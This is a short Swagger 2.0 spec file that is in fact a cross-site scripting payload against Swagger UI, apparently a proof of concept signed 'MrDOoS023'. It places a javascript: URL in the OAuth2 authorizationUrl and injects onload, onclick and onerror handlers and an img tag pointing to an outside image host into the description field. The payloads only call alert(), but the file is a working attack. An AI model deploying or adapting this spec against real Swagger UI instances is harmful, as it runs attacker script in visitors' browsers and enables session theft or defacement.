swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: XSS img test MrDOoS023
  description: onload="alert(/XSS+VULN+BY+MRDOOS023/)" <img src=https://i.ibb.co/tMRchpj/fapo.jpg onclick="alert(2)" onerror="alert(3)">
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
